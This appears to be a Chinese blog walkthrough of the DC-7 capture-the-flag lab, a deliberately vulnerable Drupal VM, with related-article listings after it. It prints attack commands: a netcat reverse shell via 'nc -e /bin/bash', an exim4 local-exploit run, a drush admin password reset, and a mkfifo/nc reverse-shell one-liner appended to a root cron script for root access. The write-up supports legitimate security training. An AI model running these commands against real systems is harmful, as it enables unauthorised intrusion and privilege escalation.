【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)

最新推荐文章于 2022-08-13 20:23:48 发布
最新推荐文章于 2022-08-13 20:23:48 发布
阅读量892 收藏 4
点赞数 1
分类专栏: CyberSecurityLearning 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waffle666/article/details/116566054
版权

目录

DC-7靶机渗透测试

1、信息收集

1.1 扫描开放的端口

1.2 访问WEB站点

2、登录ssh

3、 提权(suid提权)

3.1 exim4提权

4、drush 命令对任意用户密码进行更改

5、登录admin

6、拿到root权限

 

DC-7靶机渗透测试

0x00实验环境

kali的IP:192.168.3.188
DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191)

(使用Kali中的arp-scan工具扫描也可)

1、信息收集

1.1 扫描开放的端口

nmap -A 192.168.3.191 -p 1-65535 -oN nmap.A

发现开放了80端口和22端口

1.2 访问WEB站点

发现是Drupal(是国外三大开源的PHP CMS 之一)

提示:
DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 :-)
尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破解或字典攻击,您可能不会成功。
您将要做的就是在盒子外面思考。 方式在盒子外面。 :-)

1.2.1 扫描网站目录

命令:dirb http://192.168.3.191/

尝试扫描网站目录,没发现什么有价值的目录,发现了robotx.txt文件,这个文件作为常见的可以让爬虫程序扫描的文件之一,控制是否想让爬虫去爬取本站信息

对于robots.txt文件,对里面的目录或者文件都进行了访问查看,未发现有用的信息

1.2.2  通过查询DC7USER查询到DC7-User用户

查询了解到网站左下角为@DC7USER为推特的联系方式,通过查询DC7USER查询到DC7-User用户,从而查询到如下信息,明显与DC-7相关

https://github.com/Dc7User/staffdb

发现config.php,得到数据库的用户名和密码(渗透测试是需要经验积累的,不然很多都想不到!!!)

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

看样子是网站mysql数据库连接的用户名、密码,所有这里就不登录网站了,直接登录后台。dc7user / MdR3xOgB7#dW

在user/login 登录,登录失败

2、登录ssh

用ssh登录:ssh dc7user@192.168.3.191,登录成功!

查看dc7user家目录下有backup文件夹

Gpg后缀文件为加密后的文件,需要有秘钥和密码才能解密。(website.sql和website.tar.gz文件现在都是加密过的)

我们再看看mbox有什么:发现友有好多邮件(From: root@dc-7 (Cron Daemon)        To: root@dc-7)

其中的主要信息有:

Shell脚本文件   /opt/scripts/backups.sh

数据库文件:/home/dc7user/backups/website.sql

网站数据: /home/dc7user/backups/website.tar.gz

从目前情况来看,website.sql和website.tar.gz文件现在都是加密过的,现在只能把目光放在另一个文件backups.sh上

2.3.1 查看一下backups.sh这个脚本文件

顺利找到了加密的秘钥,只是解密需要root权限才可以

3、 提权(suid提权)

思路1、sudo -l(查看有没有一些命令在执行期间有root权限标签没有密码保护——Not found)

思路2、查看有没有一些具有suid权限的命令

find / -perm /4000 2>dev/null

3.1 exim4提权

3.1.1 查看exim4版本

/usr/sbin/exim4 --version

发现exim4命令的版本是4.89

3.1.2 使用searchsploit查找响应漏洞

searchsploit exim 4.

 Local Privilege Escalation(本地特权升级)

3.1.3 将响应漏洞拷贝到靶机

scp远程拷贝

把它弄到靶机里,使用scp:
需要先在kali开启ssh服务------Kali ssh服务
dc7user@dc-7:~$ scp root@192.168.3.188:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/  (在dc7user@dc-7:~$下拷贝

运行exp,错误:

./46996.sh -m netcat

有个^M,查看此exp后,看到结尾都是M,百度后的文章:
解决“/bin/bash^M: bad interpreter: No such file or directory”
sed -i "s/\r//" 46996.sh

 

重新执行exp,先监听kali上的8888端口:
./46996.sh -m netcat
nc -e /bin/bash 192.168.3.188 8888

 

这里很快就会断链了,所以要快点:
python -c 'import pty;pty.spawn("/bin/bash")'

切换root失败了,怎么办啊啊啊啊啊~

无果!

4、drush 命令对任意用户密码进行更改

查询drush是drupal shell专门管理drupal站点的shell,使用drush扫描得知drupal用户为admin,cms的管理用户

尝试重置admin用户密码,说明admin用户存在

存在!

若用户不存在则是下面这种情况

 

重置admin密码为admin,必须在/var/www/html目录下执行

通过查询可知drush 命令可以对任意用户密码进行更改

drush user-password admin --password="123456"

5、登录admin

到后台后想上传一句话木马进行连接,发现没有php模块,这样就没办法解析php,在extend中点击添加php模块

返回页面选择php添加

点击install

先在kali上监听8888端口:nc -lvvp 8888

 

Add content——》Article

写入反弹shell(OS命令注入)

content创建成功!

在kali上监听已拿到反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'打开shell交互

6、拿到root权限

kali本地监听8888端口

在/opt/scripts/目录下面输入如下命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.191 8888 >/tmp/f" >> backups.sh

反弹成功!

查看theflag文件

Wαff1ε
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Droopy v0.2 靶机渗透(drupal 7.3版本漏洞)
afei001
08-14 325
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.尝试查找drupal7.3版本漏洞 4.尝试MSF的Drupal漏洞拿下shell 5.尝试内核漏洞提权 6.继续探测获取flag 总结 练习环境 攻击机:kali 靶机:Droopy: v0.2 下载地址:https://download.vulnhub.com/droopy/DroopyCTF.ova 1.发现靶机,端口扫描 root@kali:~# netdi...
一次Drupal渗透测试
BROTHERYY的博客
03-19 1828
此次评估的环境为:1台web服务器 服务需求:该服务器对外提供web服务 网络实际应用:10.35.0.211 实际ip分配:10.35.0.245 自身环境为:win7+kali 使用工具:whatweb、nmap、msf、nc 以下所有操作都是在得到授权后进行 —————————————————————————————————————— 首先进行信息搜集,使用whatweb查看网站信息 将所...
【废了-准备删除01】渗透测试靶机搭建——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-22 4477
1. 本节主要是为后续进行渗透测试实验准备好靶机平台。
CyberSecurityLearning 70】DC系列DC-1渗透测试Drupal
_Co1a
04-18 773
目录 DC-1 靶机入侵实战 背景资料: 知识点 一、实验环境 二、实验要求 三、渗透过程演示 Flag1: Flag2: Flag3: Flag4: Flag5: DC-1 靶机入侵实战 背景资料: vulnhub 地址: https://www.vulnhub.com/entry/dc-1-1,292/ There are multiple ways of gaining root, however, I have included some flags whic.
【废了-准备删除03】对445端口进行渗透测试——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-23 2782
1. 本节演示对目标主机445端口的渗透测试。 2. 该测试需要得到目标主机用户账号或密码。此时可以通过后续漏洞利用获取到目标主机上的账户密码,或者通过密码爆破的方式碰碰运气。
BBEdit-Clippings-for-Drupal:用于Drupal 7的BBEdit剪辑
05-26
这是Drupal 7的剪裁,包括: 所有挂钩 所有drupal_ *功能 所有devel模块的打印/调试功能 常见功能,例如t,l,url,check_ * 控制结构,例如for,if和switch 氧气和功能片段 一些主题功能可用于快速插入template...
ansible-role-drupal:Ansible角色-Drupal
02-01
7. **备份与恢复**:提供备份和恢复Drupal数据库及文件的功能,保障数据安全。 8. **安全性**:执行安全最佳实践,如设置正确的文件权限,确保 Drupal 安装的安全性。 **使用ansible-role-drupal** 1. **安装角色...
CMS程序Drupal 5.19-drupal-codepub.zip
最新发布
03-09
"drupal-codepub.zip" 文件可能包含的是 Drupal 5.19 版本的源代码,以及可能的附加资源,如示例站点数据、主题、模块或文档。"资料整理"目录可能包含了与 Drupal 相关的教学材料、教程或参考资料,帮助用户更好地...
ansible-role-drupal-console:已弃用Ansible角色-Drupal控制台
02-06
标题中的“ansible-role-drupal-console”指的是一个Ansible角色,它是用于自动化安装和配置Drupal Console的工具。Drupal Console是一款基于CLI(命令行界面)的开发工具,它为Drupal开发者提供了丰富的命令来加速...
drupal-7.13
06-08
"drupal-7.13" 版本是 Drupal 发行历史中的一个重要里程碑,它包含了丰富的功能、改进和修复,旨在提供更高效、安全且用户友好的网站构建平台。 在 Drupal 7.13 版本中,主要的知识点包括: 1. **安全性增强**:...
DC user guide
01-08
Design Compile的官方用户手册,是使用DC进行电路综合必不可少的参考手册
CyberSecurityLearning 77】DC系列DC-8渗透测试Drupal
_Co1a
05-11 731
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描DC-8开放端口 1.2 访问WEB站点 2、渗透过程 2.1 用Sqlmap自动化工具注入 2.2 drush 命令对任意用户密码进行更改(发现没有进到DC-8的shell,行不通) 2.3 John爆破用户名和密码 2.3 用john用户的密码turtle登录后台 3、GetShell(利用php代码执行漏洞) 4、提权 4.1 exim4提权 DC-7靶机渗透测试 实验环境: kali的IP地址:192.168.
[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-25 1372
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
VULNHUB靶机渗透--DC-1(drupal)
aarong的博客
12-16 1011
1. nmap扫描 nmap -A 192.168.65.131 发现开启了22、80、111端口 2. 浏览器打开靶机开启的网站服务 发现是一个网站登陆界面 3. whatweb扫描出网站模板信息 网站模板是drupal,版本信息是drupal 7 4. 针对这个版本搜索渗透模块 searchsploit drupal 7 运用这个渗透模块: Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Add Admin User) cat /us
DC-7渗透笔记
现代鲁滨逊的博客
05-12 239
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
DC: 1
箭雨镜屋
06-13 540
渗透思路:nmap扫描----利用Drupal 7的RCE(CVE-2018-7600)getshell----python反弹shell----非渗透路径:Drupal配置文件中找到数据库用户名密码----非渗透路径:数据库中找到flag3、/home/flag4下发现flag4----suid权限的find命令提权...
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1189
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
Vulnhub系列DC7靶场详解
weixin_50053818的博客
05-30 1082
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
精通Drupal 7模块开发
"Drupal 7 模块开发" Drupal 7 模块开发是Drupal内容管理系统(CMS)中扩展功能的核心方式。本教程旨在帮助开发者掌握如何从零开始创建自己的Drupal 7模块。以下是对各章节内容的详细解读: **Chapter 1: Developing...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值